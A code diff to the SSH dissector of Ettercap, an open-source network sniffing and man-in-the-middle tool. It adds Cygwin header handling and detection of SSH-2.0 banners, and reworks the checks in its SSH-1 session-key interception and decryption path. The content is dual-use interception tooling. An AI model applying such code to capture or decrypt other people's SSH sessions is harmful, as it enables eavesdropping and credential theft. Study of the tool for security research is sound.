@@ -17,14 +17,18 @@
     along with this program; if not, write to the Free Software
     Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
 
-    $Id: ec_dissector_ssh.c,v 1.7 2001/12/13 18:58:24 alor Exp $
+    $Id: ec_dissector_ssh.c,v 1.11 2002/02/10 10:07:49 alor Exp $
 */
 
 #include "include/ec_main.h"
 
 #ifdef HAVE_OPENSSL  // don't compile if you don't have OpenSSL
 
-#include <arpa/nameser.h>
+#ifdef CYGWIN
+	#include "./missing/include/nameser.h"
+#else
+	#include <arpa/nameser.h>
+#endif
 #include <openssl/ssl.h>
 #include <openssl/rand.h>
 #include <ctype.h>
@@ -315,6 +319,12 @@ FUNC_DISSECTOR(Dissector_ssh)
    payload = (u_char *)((u_long)tcp + tcp->doff * 4);
    to_arrive = (u_long)payload+datalen;
 
+   if ( !memcmp(payload,"SSH-2.0",7) )
+   {
+       sprintf(data_to_ettercap->type, "ssh 2");
+       return 0;
+   }
+
    ssh_len = ptohl(payload);
    ssh_len = ntohl(ssh_len);
    ssh_mod = 8 - (ssh_len % 8);
@@ -327,7 +337,7 @@ FUNC_DISSECTOR(Dissector_ssh)
       // Skip to binary data
       p = payload+4+ssh_mod+1;
 
-      if ( Encrypt_state(payload+4, ssh_mod) )  // Crypted packets
+//      if ( Encrypt_state(payload+4, ssh_mod) )  // Crypted packets
       {
          ssh_state **index_ssl;
          struct peer pckpeer;
@@ -364,10 +374,10 @@ FUNC_DISSECTOR(Dissector_ssh)
               direction=2;
          }
 
-         if (!direction) return 0; // Skip Crypted messages whith no session
+         if (!direction && Encrypt_state(payload+4, ssh_mod)) return 0; // Skip Crypted messages whith no session
 
          // Continue for no 0padding in session key for damnPutty
-         if((*index_ssl)->state_source && (*index_ssl)->state_dest)
+         if(direction && (*index_ssl)->state_source && (*index_ssl)->state_dest)
          {
            char pacchetto[MAX_DATA];
            char packet[MAX_DATA];
@@ -482,7 +492,7 @@ FUNC_DISSECTOR(Dissector_ssh)
            return 0;
          }
       }
-      else  // Plain text packets
+      //else  // Plain text packets
       if (ssh_packet_type==2 /*&& (Conn_Mode || Options.normal)*/) //PUBLIC_KEY
       {
          ssh_state **index_ssl;
